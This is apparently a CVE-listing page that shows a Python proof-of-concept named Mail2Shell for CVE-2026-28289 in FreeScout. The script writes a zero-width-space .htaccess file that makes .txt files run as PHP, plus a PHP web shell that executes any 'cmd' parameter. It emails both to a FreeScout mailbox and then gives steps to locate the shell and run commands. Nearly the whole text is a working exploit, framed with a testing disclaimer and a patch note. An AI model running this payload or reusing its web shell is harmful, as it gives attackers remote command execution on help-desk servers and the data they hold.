5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-28289
README.md
Rendering markdown...
POC / Mail2Shell.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
import sys
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from datetime import datetime

print("=== https://github.com/0xAshwesker/CVE-2026-28289  ===")
print("=== CVE-2026-28289 Mail2Shell PoC (Zero-Click RCE) ===")
print("Legal testing ONLY on your own server\n")

if len(sys.argv) < 2:
    print("Usage: sudo python3 CVE-2026-28289.py http://target")
    sys.exit(1)

target = sys.argv[1].rstrip('/')
print(f"Target: {target}\n")

# Interactive prompts (SMTP details required for email attack)
smtp_server = input("SMTP Server (e.g. smtp.gmail.com): ")
smtp_port = int(input("SMTP Port (usually 587): "))
smtp_user = input("SMTP Username (your email): ")
smtp_pass = input("SMTP Password/App Password: ")
from_email = input("From Email: ")
to_email = input("To Email (ANY mailbox configured in FreeScout): ")

# Create malicious files (official bypass method)
zwsp = '\u200b'
htaccess_name = zwsp + '.htaccess'
with open(htaccess_name, 'w', encoding='utf-8') as f:
    f.write('AddHandler application/x-httpd-php .txt\n')

webshell_name = 'webshell.txt'
with open(webshell_name, 'w', encoding='utf-8') as f:
    f.write('<?php if(isset($_GET["cmd"])) { echo "<pre>".shell_exec($_GET["cmd"])."</pre>"; } ?>')

print("✅ Malicious files created (.htaccess + webshell.txt)")

# Send the email (zero-click trigger)
msg = MIMEMultipart()
msg['From'] = from_email
msg['To'] = to_email
msg['Subject'] = f"Mail2Shell Test {datetime.now()}"

for filename in [htaccess_name, webshell_name]:
    with open(filename, 'rb') as f:
        part = MIMEBase('application', 'octet-stream')
        part.set_payload(f.read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition', f'attachment; filename="{filename}"')
        msg.attach(part)

try:
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.starttls()
    server.login(smtp_user, smtp_pass)
    server.send_message(msg)
    server.quit()
    print("✅ Email sent successfully! (Zero-Click RCE triggered)")
except Exception as e:
    print(f"❌ SMTP Error: {e}")
    sys.exit(1)

# Cleanup local files
import os
os.remove(htaccess_name)
os.remove(webshell_name)

print("\n" + "="*60)
print("NEXT STEP (you have server access):")
print("SSH to your FreeScout server and run this command:")
print(f"find /var/www/html/storage/attachment -name webshell.txt -type f 2>/dev/null")
print("(change /var/www/html if your install path is different)")
print("\nWhen you find the path (example: /storage/attachment/2026/03/05/15/webshell.txt)")
print("Open in browser:")
print(f"{target}/storage/attachment/[FULL-PATH-FROM-FIND]/webshell.txt?cmd=whoami")
print(f"{target}/storage/attachment/[FULL-PATH-FROM-FIND]/webshell.txt?cmd=id")
print("="*60)

print("\nYou now have full RCE. Test done? Patch immediately to 1.8.207 + set AllowOverride None")